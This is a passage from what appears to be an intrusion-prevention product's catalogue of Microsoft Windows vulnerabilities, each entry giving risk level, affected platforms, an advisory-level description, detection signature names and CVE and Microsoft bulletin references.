Description: There exists a heap buffer overflow vulnerability in Microsoft Graphics Device Interface (GDI) library. The flaw is due to an integer overflow while handling WMF image files. A remote attacker can exploit this vulnerability by enticing the target user to open a crafted WMF image file, potentially causing arbitrary code to be injected and executed in the security context of the currently logged on user. An attack targeting this vulnerability can result in the injection and execution of code. If code execution is successful, the behaviour of the target will depend on the intention of the attacker. Any code injected will be executed within the security context of the currently logged on user. In the case of an unsuccessful code execution attack, the affected application will terminate resulting in the loss of any unsaved data from the current session.
Situation: File-Binary_Microsoft-Windows-GDI-WMF-File-Headersize-Buffer-Overflow
References:
CVE-2008-2249
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2249
BID-32634
http://www.securityfocus.com/bid/32634
MS08-071
http://technet.microsoft.com/security/bulletin/MS08-071
Back to top

Microsoft-Windows-Gdiplus-EMF-Handling-Integer-Overflow

About this vulnerability: A vulnerability in Microsoft Windows
Risk: Moderate
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows XP; Windows 2003; Windows Vista; Windows 2008; Windows 7
Software: <os>
Type: Integer Overflow
Description: An integer overflow vulnerability exists Microsoft Windows Graphics Device Interface (GDI+). The vulnerability is due to an error in integer calculations when handling EMF files, which can cause memory corruption. A remote unauthenticated attacker could exploit this vulnerability by enticing a user to open or view (potentially via a web page) a specially crafted EMF file. Successful exploitation could result in arbitrary code execution in the context of the currently logged in user.
Situation: File-Binary_Microsoft-Windows-Gdiplus-EMF-Handling-Integer-Overflow
References:
CVE-2011-0041
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0041
MS11-029
http://technet.microsoft.com/security/bulletin/MS11-029
Back to top

Microsoft-Windows-Gdiplus-Gpfont.setdata-Integer-Overflow

About this vulnerability: A vulnerability in Microsoft Windows
Risk: High
First detected in: sgpkg-ips-378-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Integer Overflow
Description: A vulnerability has been reported in Microsoft Windows Graphics Device Interface.
Situation: HTTP_SS-Microsoft-Windows-Gdiplus-Gpfont.setdata-Integer-Overflow
File-Binary_Microsoft-Windows-Gdiplus-Gpfont.setdata-Integer-Overflow
References:
CVE-2009-1217
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1217
BID-34250
http://www.securityfocus.com/bid/34250
Back to top

Microsoft-Windows-Gdiplus-PNG-Processing-Integer-Overflow

About this vulnerability: A vulnerability in Microsoft Expression Web
Risk: High
First detected in: sgpkg-ips-382-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Integer Overflow
Description: An integer overflow vulnerability exists in Microsoft Windows GDI+ that could allow remote code execution.
Situation: HTTP_SS-Microsoft-Windows-Gdiplus-PNG-Processing-Integer-Overflow
File-PNG_Microsoft-Windows-Gdiplus-PNG-Processing-Integer-Overflow
References:
CVE-2009-3126
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3126
BID-36649
http://www.securityfocus.com/bid/36649
MS09-062
http://technet.microsoft.com/security/bulletin/MS09-062
Back to top

Microsoft-Windows-Gdiplus-TIFF-Parsing-Buffer-Overflow

About this vulnerability: A vulnerability in Microsoft Expression Web
Risk: Moderate
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer; Microsoft Office
Type: Buffer Overflow
Description: A buffer overflow vulnerability exists in Microsoft Windows GDI+ that could allow remote code execution. The vulnerability is due to the way that Microsoft Windows GDI allocates memory. A remote attacker can exploit this vulnerability by enticing the target to open a specially crafted TIFF file. In the case of successful code injection and execution, the behaviour of the target is dependent on the intention of the malicious code. The injected code will be executed with the privileges of the currently user. In the case where code execution is not successful, the application may terminate abnormally.
Situation: HTTP_SS_Microsoft-Windows-Gdiplus-TIFF-Parsing-Buffer-Overflow
File-Binary_Microsoft-Windows-Gdiplus-TIFF-Parsing-Buffer-Overflow
References:
CVE-2009-2502
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2502
BID-36646
http://www.securityfocus.com/bid/36646
MS09-062
http://technet.microsoft.com/security/bulletin/MS09-062
Back to top

Microsoft-Windows-Gdiplus-WMF-Integer-Overflow

About this vulnerability: A vulnerability in Microsoft Excel Viewer
Risk: Moderate
First detected in: sgpkg-ips-613-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Office
Type: Integer Overflow
Description: An integer overflow vulnerability exists in Microsoft Windows GDI+ library. The vulnerability is due to an input validation error in Microsoft Windows while processing a crafted WMF image file. Remote attackers could exploit this vulnerability by persuading a target user to open a specially crafted WMF image file in the vulnerable products. Successful exploitation would cause a heap buffer overflow that may lead to arbitrary code execution in the security context of the logged in user, or terminate the application resulting in a Denial of Service condition.
Situation: File-Binary_Microsoft-Windows-Gdiplus-WMF-Integer-Overflow
References:
CVE-2009-2500
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2500
BID-36619
http://www.securityfocus.com/bid/36619
MS09-062
http://technet.microsoft.com/security/bulletin/MS09-062
Back to top

Microsoft-Windows-Graphics-Component-Createcolorspace-EMF-Out-Of-Bounds-Read

About this vulnerability: A vulnerability in Microsoft Windows
Risk: Moderate
First detected in: sgpkg-ips-1594-5242
Last changed: sgpkg-ips-1594-5242
Platform: Windows
Software: <os>
Type: Malfunction
Description: An out of bounds read in the Graphics Component when handling EMF files causes a vulnerability in Windows. A successful exploit allows an attacker to access information on the target system.
Situation: File-Binary_Microsoft-Windows-Graphics-Component-Createcolorspace-EMF-Out-Of-Bounds-Read
References:
CVE-2022-37985
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-37985
Back to top

Microsoft-Windows-Graphics-Component-CVE-2016-3301-Code-Execution

About this vulnerability: A vulnerability in Microsoft Windows
Risk: Moderate
First detected in: sgpkg-ips-797-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Input Validation
Description: A vulnerability in Microsoft Windows
Situation: File-Binary_Microsoft-Windows-Graphics-Component-CVE-2016-3301-Code-Execution
References:
CVE-2016-3301
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3301
MS16-097
http://technet.microsoft.com/security/bulletin/MS16-097
Back to top

Microsoft-Windows-Graphics-Component-CVE-2016-3303-Code-Execution

About this vulnerability: A vulnerability in Microsoft Windows
Risk: Moderate
First detected in: sgpkg-ips-789-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Input Validation
Description: An attempt to exploit a vulnerability in Microsoft Windows detected
Situation: File-Binary_Microsoft-Windows-Graphics-Component-CVE-2016-3303-Code-Execution
References:
CVE-2016-3303
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3303
MS16-097
http://technet.microsoft.com/security/bulletin/MS16-097
Back to top

Microsoft-Windows-Graphics-Component-CVE-2016-3304-Code-Execution

About this vulnerability: A vulnerability in Microsoft Windows
Risk: Moderate
First detected in: sgpkg-ips-793-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Input Validation
Description: A vulnerability in Microsoft Windows
Situation: File-Binary_Microsoft-Windows-Graphics-Component-CVE-2016-3304-Code-Execution
References:
CVE-2016-3304
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3304
MS16-097
http://technet.microsoft.com/security/bulletin/MS16-097
Back to top

Microsoft-Windows-Graphics-Component-CVE-2017-11816-Information-Disclosure

About this vulnerability: A vulnerability in Microsoft Windows
Risk: Moderate
First detected in: sgpkg-ips-1023-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Malfunction
Description: There has been reported a vulnerability in the GDI component of Microsoft Windows. A remote attacker could exploit this by having a victim to open maliciously crafted web page. Successful exploitation could allow the attacker to gain sensitive information that may help in further attacks.
Situation: File-Binary_Microsoft-Windows-Graphics-Component-CVE-2017-11816-Information-Disclosure
References:
CVE-2017-11816
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11816
Back to top

Microsoft-Windows-Graphics-Component-Information-Disclosure-CVE-2018-8239

About this vulnerability: An attempt to exploit a vulnerability in Windows detected
Risk: High
First detected in: sgpkg-ips-1777-5242
Last changed: sgpkg-ips-1777-5242
Platform: Windows
Software: <os>
Type: Input Validation
Description: An information disclosure vulnerability has been reported in the GDI component of Microsoft Windows. The vulnerability is due to an improper disclosure of the contents of the memory. A remote attacker can exploit this vulnerability by enticing a victim to open a maliciously crafted web page or document. Successful exploitation would allow the attacker to gain sensitive information that may help in further attacks.
Situation: File-Binary_Microsoft-Windows-Graphics-Component-Information-Disclosure-CVE-2018-8239
References:
CVE-2018-8239
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8239
Back to top

Microsoft-Windows-Graphics-Component-Meta_Setdibtodev-Information-Disclosure

About this vulnerability: A vulnerability in Microsoft Windows
Risk: Moderate
First detected in: sgpkg-ips-975-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Malfunction
Description: A vulnerability in Microsoft Windows
Situation: File-Binary_Microsoft-Windows-Graphics-Component-Meta_Setdibtodev-Information-Disclosure
References:
CVE-2017-0190
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0190
Back to top

Microsoft-Windows-Graphics-Component-Remote-Code-Execution

About this vulnerability: A Microsoft Windows Graphics Component Remote Code Execution vulnerability
Risk: High
First detected in: sgpkg-ips-836-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Windows Graphics Rendering Engine
Type: Input Validation
Description: A vulnerability in Microsoft Windows Graphic Component which allows remote attackers to execute arbitrary code.
Situation: File-Binary_Microsoft-Windows-Graphics-Component-Remote-Code-Execution
References:
CVE-2016-7272
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7272
Back to top

Microsoft-Windows-Graphics-Device-Integer-Overflow-Vulnerability

About this vulnerability: A vulnerability in Microsoft Windows
Risk: Moderate
First detected in: sgpkg-ips-550-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows XP; Windows 2003; Windows Vista; Windows 2008; Windows 7; Windows 8; Windows 2012; Windows RT
Software: <os>
Type: Buffer Overflow
Description: A vulnerability exists in the way Windows processes embedded bitmap images. A specially crafted file, with invalid values inserted into the bitmap info header, could cause a buffer overflow and possibly remote code execution.
Situation: File-OLE_Microsoft-Windows-Graphics-Device-Integer-Overflow-Vulnerability
File-Binary_Microsoft-Windows-Graphics-Device-Integer-Overflow-Vulnerability
References:
CVE-2013-3940
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3940
OSVDB-99646
http://www.osvdb.org/99646
MS13-089
http://technet.microsoft.com/security/bulletin/MS13-089
Back to top

Microsoft-Windows-Graphics-Device-Interface-EMR_Header-Information-Disclosure

About this vulnerability: A vulnerability in Microsoft Windows
Risk: Moderate
First detected in: sgpkg-ips-1130-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Malfunction
Description: There has been reported an information disclosure vulnerability in the Graphics Device Interface (GDI) component of Microsoft Windows. This vulnerability could be exploited by a remote attacker and it could lead in disclosure of information.
Situation: File-Binary_Microsoft-Windows-Graphics-Device-Interface-EMR_Header-Information-Disclosure
References:
CVE-2018-8595
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8595
Back to top

Microsoft-Windows-Graphics-Device-Interface-Information-Disclosure

About this vulnerability: A vulnerability in Microsoft Windows
Risk: Moderate
First detected in: sgpkg-ips-1108-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Malfunction
Description: An attempt to exploit a vulnerability in Microsoft Windows detected
Situation: File-Binary_Microsoft-Windows-Graphics-Device-Interface-Information-Disclosure
References:
CVE-2018-8424
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8424
Back to top

Microsoft-Windows-Graphics-Device-Interface-Integer-Overflow

About this vulnerability: A vulnerability in Microsoft Windows
Risk: Moderate
First detected in: sgpkg-ips-765-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Integer Overflow
Description: Improper handling of EMF files can result in an attacker gaining code execution privileges on the target system.
Situation: File-Binary_Microsoft-Windows-Graphics-Device-Interface-Integer-Overflow
References:
CVE-2016-0170
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0170
MS16-055
http://technet.microsoft.com/security/bulletin/MS16-055
Back to top

Microsoft-Windows-Graphics-Device-Interface-Out-Of-Bounds-Access

About this vulnerability: A vulnerability in Microsoft Windows
Risk: Moderate
First detected in: sgpkg-ips-768-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Malfunction
Description: Improper validation of EMF file structures causes a vulnerability in Windows. A successful exploit will allow an attacker to leak information from the system.
Situation: File-Binary_Microsoft-Windows-Graphics-Device-Interface-Out-Of-Bounds-Access
References:
CVE-2016-0169
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0169
MS16-055
http://technet.microsoft.com/security/bulletin/MS16-055
Back to top

Microsoft-Windows-Graphics-Rendering-Engine-EMF-Parsing-Memory-Corruption

About this vulnerability: A vulnerability in Microsoft Digital Image Suite
Risk: High
First detected in: sgpkg-ips-586-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Forefront Client Security; Internet Explorer; Microsoft Office 2003; Microsoft Office XP; Microsoft PowerPoint Viewer; Microsoft Report Viewer; Microsoft SQL Server; Microsoft Visio; Microsoft Works
Type: Malfunction
Description: A remote code execution vulnerability exists in the way that GDI+ handles parsing of EMF image files. A remote attacker can exploit this vulnerability by enticing the target user to open a crafted EMF file image. Successful exploitation can result in memory corruption which may lead to arbitrary code execution under the credentials of the currently logged in user. In a successful attack case, the malicious code can be executed on the target host. The behaviour of the target depends upon the intention of the attacker. The code will be executed with the privileges of the logged in user. In case if the attack is not successful, the application using the affected library might be terminated due to memory corruption.
Situation: File-Binary_Microsoft-Windows-Graphics-Rendering-Engine-EMF-Parsing-Memory-Corruption
References:
CVE-2008-3012
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3012
BID-31019
http://www.securityfocus.com/bid/31019
MS08-052
http://technet.microsoft.com/security/bulletin/MS08-052
Back to top

Microsoft-Windows-Graphics-Rendering-Engine-Gif-Parsing-Buffer-Overflow

About this vulnerability: A vulnerability in Microsoft Digital Image Suite
Risk: High
First detected in: sgpkg-ips-586-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Forefront Client Security; Internet Explorer; Microsoft Office XP; Microsoft PowerPoint Viewer; Microsoft Report Viewer; Microsoft SQL Server; Microsoft Visio; Microsoft Works
Type: Malfunction
Description: A remote code execution vulnerability exists in the way that Microsoft Windows Graphics Rendering Engine parses GIF images. A remote attacker can exploit this vulnerability by enticing the target user to open a crafted GIF file image. Successful exploitation can result in arbitrary code execution under the credentials of the currently logged in user. In a successful attack case, the malicious code can be injected and executed on the target host. The behaviour of the target depends upon the intention of the attacker, and the code will be executed with the privileges of the logged in user. In case if the attack is not successful, the application using the affected library will be terminated due to memory corruption. If the malicious file is opened in Explorer.exe, the process will be terminated, but automatically restarted by Windows.
Situation: File-GIF_Microsoft-Windows-Graphics-Rendering-Engine-Gif-Parsing-Buffer-Overflow
References:
CVE-2008-3013
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3013
BID-31020
http://www.securityfocus.com/bid/31020
MS08-052
http://technet.microsoft.com/security/bulletin/MS08-052
Back to top

Microsoft-Windows-Graphics-Rendering-Engine-VML-BOF

About this vulnerability: A vulnerability in Microsoft Windows Graphics Rendering Enigine
Risk: High
First detected in: sgpkg-ips-196-2032
Last changed: sgpkg-ips-1296-5242
Platform: Windows XP 64-bit; Windows XP 64-bit SP2; Windows Vista; Windows Vista SP1; Windows 2003 64-bit; Windows 2003 SP1; Windows 2003 SP2; Windows 2008
Software: <os>
Type: Buffer Overflow
Description: A vulnerability has been discovered in the Graphics Rendering Engine (GRE) component of Microsoft Windows. The vulnerability is due to the way that GDI+ handles gradient sizes. An attacker can exploit this vulnerability by enticing a user to browse a malicious Web site with specially crafted content. An attack can lead to denial of service, or in the injection and execution of arbitrary code with the privileges of the currently logged in user.
Situation: HTTP_SS-Microsoft-Windows-Graphics-Rendering-Engine-VML-Negative-Focussize
File-Text_Microsoft-Windows-Graphics-Rendering-Engine-VML-Negative-Focussize
References:
CVE-2007-5348
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5348
BID-31018
http://www.securityfocus.com/bid/31018
MS08-052
http://technet.microsoft.com/security/bulletin/MS08-052
Back to top

Microsoft-Windows-Graphics-Rendering-Engine-WMF-Polygon-Parsing-BOF

About this vulnerability: A vulnerability in Microsoft Windows Graphics Rendering Enigine
Risk: High
First detected in: sgpkg-ips-167-2032
Last changed: sgpkg-ips-1296-5242
Platform: Windows XP 64-bit; Windows XP 64-bit SP2; Windows Vista; Windows Vista SP1; Windows 2003 64-bit; Windows 2003 SP1; Windows 2003 SP2; Windows 2008
Software: <os>
Type: Buffer Overflow
Description: There is a vulnerability in the Graphics Rendering Engine (GRE) component of Microsoft Windows. Specifically this vulnerability is exposed by the Microsoft Windows GDI+ subsystem. The vulnerability is created by an error during the parsing of certain Windows Metafile (WMF) files. An attacker can exploit this vulnerability by enticing a user to open a malicious WMF file, resulting in either a denial of service, or in the injection and execution of arbitrary code with the privileges of the currently logged in user.
Situation: HTTP_SS-Microsoft-Windows-Graphics-Rendering-Engine-WMF-Polygon-Parsing-BOF
File-Binary_Microsoft-Windows-Graphics-Rendering-Engine-WMF-Polygon-Parsing-BOF
References:
CVE-2008-3014
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3014
BID-31021
http://www.securityfocus.com/bid/31021
MS08-052
http://technet.microsoft.com/security/bulletin/MS08-052
Back to top

Microsoft-Windows-GRE-WMF-Handling-Memory-Read-Exception

About this vulnerability: A vulnerability in Microsoft Windows
Risk: Moderate
First detected in: sgpkg-ips-436-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Malfunction
Description: There exists a denial of service vulnerability in the Graphics Rendering Engine (GRE) component of Microsoft Windows. The vulnerability is created by an error in parsing certain Windows Metafile (WMF) files. An attacker can exploit this vulnerability to cause the executing program to terminate via a crafted WMF file. An successful attack exploiting this vulnerability can cause the vulnerable application that opens the malicious WMF file to terminate. Some versions of the Windows Explorer and the Windows picture and fax viewer are the most likely affected applications.
Situation: File-Binary_Microsoft-Windows-GRE-WMF-Handling-Memory-Read-Exception
References:
CVE-2006-0143
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0143
BID-16167
http://www.securityfocus.com/bid/16167
Back to top

Microsoft-Windows-HLP-File-Handling-Heap-Buffer-Overflow

About this vulnerability: A vulnerability in Microsoft Windows
Risk: Moderate
First detected in: sgpkg-ips-436-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Buffer Overflow
Description: There is a buffer overflow vulnerability in Microsoft Windows. The vulnerability is due to a boundary error while handling specially crafted Windows Help (HLP) files. Remote attackers can exploit this vulnerability by enticing the target user to open a malicious HLP file that would trigger a heap-based buffer overflow condition. Successful exploitation may allow arbitrary code injection and execution with the privileges of the currently logged-in user. In an attack case where code injection is not successful, all instances of the vulnerable application will terminate or stop responding. In a more sophisticated attack, where code injection is successful, the behaviour of the target system is entirely dependent on the intended function of the injected code. The code in such a case would execute within the security context of the current user.
Situation: File-Binary_Microsoft-Windows-HLP-File-Handling-Heap-Buffer-Overflow
References:
CVE-2007-1912
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1912
BID-23382
http://www.securityfocus.com/bid/23382
Back to top

Microsoft-Windows-HTTP.sys-DoS-CVE-2022-35748

About this vulnerability: A vulnerability in Microsoft Windows HTTP Protocol Stack
Risk: High
First detected in: sgpkg-ips-1491-5242
Last changed: sgpkg-ips-1491-5242
Platform: Windows
Software: <os>
Type: Malfunction
Description: A vulnerability in the parsing of a Server Name Indication (SNI) in the HTTP Protocol Stack (HTTP.sys) on a Windows Server enables an unauthenticated attacker to cause a denial of service (DOS).
Situation: HTTPS_CS-Microsoft-Windows-HTTP.sys-DoS-CVE-2022-35748
References:
CVE-2022-35748
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-35748
ms22-aug
http://technet.microsoft.com/security/bulletin/ms22-aug
Back to top

Microsoft-Windows-IKE-Ikeinitmmresponderphase1-Null-Pointer-Dereference

About this vulnerability: A vulnerability in Microsoft Windows
Risk: High
First detected in: sgpkg-ips-1595-5242
Last changed: sgpkg-ips-1595-5242
Platform: Windows
Software: <os>
Type: Malfunction
Description: A NULL pointer dereference vulnerability has been reported in the Windows IKE extensions. The vulnerability is due to improper handling of incoming packets when IPsec is enabled on the machine. A remote attacker could exploit this vulnerability by sending a crafted Vendor ID payload to a target server. Successful exploitation results in denial of service conditions on the target server.
Situation: Generic_UDP-Microsoft-Windows-IKE-Ikeinitmmresponderphase1-Null-Pointer-Dereference
References:
CVE-2023-21758
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-21758
ms23-jan
http://technet.microsoft.com/security/bulletin/ms23-jan
Back to top

Microsoft-Windows-IKE-Vendor-Id-CVE-2023-21547-Null-Pointer-Dereference

About this vulnerability: A vulnerability in Microsoft Windows
Risk: High
First detected in: sgpkg-ips-1591-5242
Last changed: sgpkg-ips-1594-5242
Platform: Windows
Software: <os>
Type: Malfunction
Description: A NULL pointer dereference vulnerability has been reported in the Windows IKE extensions. The vulnerability is due to improper handling of incoming packets when IPsec is enabled on the machine. A remote attacker could exploit this vulnerability by sending a crafted Vendor ID payload to a target server. Successful exploitation results in denial of service conditions on the target server.
Situation: Generic_UDP-Microsoft-Windows-IKE-Vendor-Id-CVE-2023-21547-Null-Pointer-Dereference
References:
CVE-2023-21547
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-21547
ms23-jan
http://technet.microsoft.com/security/bulletin/ms23-jan
Back to top

Microsoft-Windows-Image-ICC-Profile-Code-Execution

About this vulnerability: A vulnerability in Microsoft Windows
Risk: Moderate
First detected in: sgpkg-ips-1104-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Malfunction
Description: Improper parsing of ICC profile data in image files causes a code execution vulnerability in Microsoft Windows.
Situation: File-Binary_Microsoft-Windows-Image-ICC-Profile-Code-Execution
File-JPEG_Microsoft-Windows-Image-ICC-Profile-Code-Execution
File-PNG_Microsoft-Windows-Image-ICC-Profile-Code-Execution
References:
CVE-2018-8475
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8475
Back to top

Microsoft-Windows-Imaging-API-Use-After-Free

About this vulnerability: A vulnerability in Microsoft Windows
Risk: Moderate
First detected in: sgpkg-ips-1202-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Malfunction
Description: There exists a use after free vulnerability in the Microsoft Windows Imaging API. A malicious file must be opened to exploit the vulnerability. Successful exploitation could lead in arbitrary code execution.
Situation: File-Binary_Microsoft-Windows-Imaging-API-Use-After-Free
References:
CVE-2019-1311
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1311
Back to top

Microsoft-Windows-Insecure-Library-Loading

About this vulnerability: A vulnerability in Microsoft Windows
Risk: Moderate
First detected in: sgpkg-ips-413-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Malfunction
Description: An insecure library loading vulnerability has been reported in Microsoft Windows. The vulnerability is due to a design weakness exhibited during DLL loading. A remote attacker could exploit this vulnerability by enticing a target user to open a crafted file from an SMB or a WebDAV share. A successful attack could result in the execution of arbitrary code in the security context of the target user.
Situation: HTTP_CSU-Microsoft-Windows-Insecure-Library-Loading
SMB-TCP_Microsoft-Windows-Insecure-Library-Loading
References:
CVE-2011-1991
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1991
BID-47741
http://www.securityfocus.com/bid/47741
MS11-071
http://technet.microsoft.com/security/bulletin/MS11-071
Back to top

Microsoft-Windows-Insecure-Library-Loading-CVE-2012-2519

About this vulnerability: A vulnerability in Microsoft Windows .NET
Risk: Moderate
First detected in: sgpkg-ips-491-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft .NET Framework
Type: Malfunction
Description: There is a vulnerability in Microsoft .NET Framework.
Situation: HTTP_CSU-Microsoft-Windows-Insecure-Library-Loading-CVE-2012-2519
SMB-TCP_Microsoft-Windows-Insecure-Library-Loading-CVE-2012-2519
References:
CVE-2012-2519
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2519
MS12-074
http://technet.microsoft.com/security/bulletin/MS12-074
Back to top

Microsoft-Windows-Integer-Underflow-CVE-2015-6130

About this vulnerability: A vulnerability in Windows
Risk: High
First detected in: sgpkg-ips-711-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows 7; Windows 2008 R2
Software: <os>
Type: Input Validation
Description: There is a vulnerability in Microsoft Windows.
Situation: File-Binary_Microsoft-Windows-Integer-Underflow-CVE-2015-6130
References:
CVE-2015-6130
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-6130
MS15-130
http://technet.microsoft.com/security/bulletin/MS15-130
Back to top

Microsoft-Windows-Internet-Key-Exchange-Protocol-Extensions-Denial-of-Service

About this vulnerability: A vulnerability in the Windows IKE extensions.
Risk: High
First detected in: sgpkg-ips-1532-5242
Last changed: sgpkg-ips-1532-5242
Platform: Windows
Software: <os>
Type: Malfunction
Description: A vulnerability in the Windows IKE extensions, multiple Windows versions, which allows remote attackers to create a denail of service condition on the target server by sending a crafted ISAKMP packet, due to improper handling of incoming packets when IPsec is enabled on the machine.
Situation: Generic_UDP-Microsoft-Windows-Internet-Key-Exchange-Protocol-Extensions-Denial-of-Service
References:
CVE-2022-34720
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-34720
Back to top

Microsoft-Windows-Internet-Printing-Service-Integer-Overflow

About this vulnerability: A vulnerability in Microsoft Windows
Risk: Moderate
First detected in: sgpkg-ips-436-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Integer Overflow
Description: There is an integer overflow vulnerability in Microsoft Windows Internet Printing. The flaw is due to insufficient input validation of print server responses. Remote authenticated attackers can exploit this vulnerability by sending specially crafted messages to the affected interface. A successful exploitation can lead to arbitrary code execution with System level privileges. If code injection attack is successful, the behaviour of the target is entirely dependent on the intended function of the injected code. The code in such a case would execute within the security of the affected IIS process. In an attack case where code injection is not successful, the IIS process will terminate abnormally, in most case it will restart automatically to resume normal operation.
Situation: SMB-TCP_Microsoft-Windows-Internet-Printing-Service-Integer-Overflow
References:
CVE-2008-1446
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1446
BID-31682
http://www.securityfocus.com/bid/31682
MS08-062
http://technet.microsoft.com/security/bulletin/MS08-062
Back to top

Microsoft-Windows-Internet-Shortcut-File-Security-Feature-Bypass-CVE-2023-36025

About this vulnerability: A vulnerability in Microsoft Windows
Risk: High
First detected in: sgpkg-ips-1757-5242
Last changed: sgpkg-ips-1841-5242
Platform: Windows
Software: <os>
Type: Malfunction
Description: Maliciously crafted Internet Shortcut files that point to a Control Panel file can bypass the Microsoft Defender SmartScreen security warning dialog.
Situation: File-Text_Microsoft-Windows-Internet-Shortcut-File-Security-Feature-Bypass-CVE-2023-36025
File-Text_Suspicious-Internet-Shortcut-File
File-TextId_Microsoft-Windows-Internet-Shortcut-File-Security-Feature-Bypass-CVE-2023-36025
File-TextId_Suspicious-Internet-Shortcut-File
References:
CVE-2023-36025
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-36025
ms23-nov
http://technet.microsoft.com/security/bulletin/ms23-nov
Back to top

Microsoft-Windows-Internet-Shortcut-File-Security-Feature-Bypass-CVE-2024-21412

About this vulnerability: A vulnerability in Microsoft Windows
Risk: High
First detected in: sgpkg-ips-1757-5242
Last changed: sgpkg-ips-1757-5242
Platform: Windows
Software: <os>
Type: Malfunction
Description: Maliciously crafted Internet Shortcut files that point to another shortcut file can bypass the Microsoft Defender SmartScreen security warning dialog.
Situation: File-Text_Microsoft-Windows-Internet-Shortcut-File-Security-Feature-Bypass-CVE-2024-21412
File-TextId_Microsoft-Windows-Internet-Shortcut-File-Security-Feature-Bypass-CVE-2024-21412
References:
CVE-2024-21412
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21412
ms24-feb
http://technet.microsoft.com/security/bulletin/ms24-feb
Back to top

Microsoft-Windows-IP-Validation-Vulnerability

About this vulnerability: A vulnerability in Microsoft Windows
Risk: High
First detected in: sgpkg-ips-378-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Malfunction
Description: A vulnerability exists in the Microsoft Windows operating systems' processing of IP (Internet Protocol) packets. The affected systems do not perform sufficient validation on IP options fields. This flaw may allow an unauthenticated attacker to cause a denial of service, or inject and execute arbitrary code on the target system. The vulnerable target system will shut down as a result of a successful denial of service attack targeting this vulnerability. In a successful code injection and execution attack, the target system will execute attacker supplied code at the system privilege level. The behaviour of the target system in such a case is dependant on the intention of the injected code.
Situation: IP_Option-Too-Long
References:
CVE-2005-0048
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0048
BID-13116
http://www.securityfocus.com/bid/13116
MS05-019
http://technet.microsoft.com/security/bulletin/MS05-019
Back to top

Microsoft-Windows-IPv6-DoS-Vulnerability-CVE-2014-0254

About this vulnerability: A vulnerability in Microsoft Windows
Risk: Moderate
First detected in: sgpkg-ips-564-5211
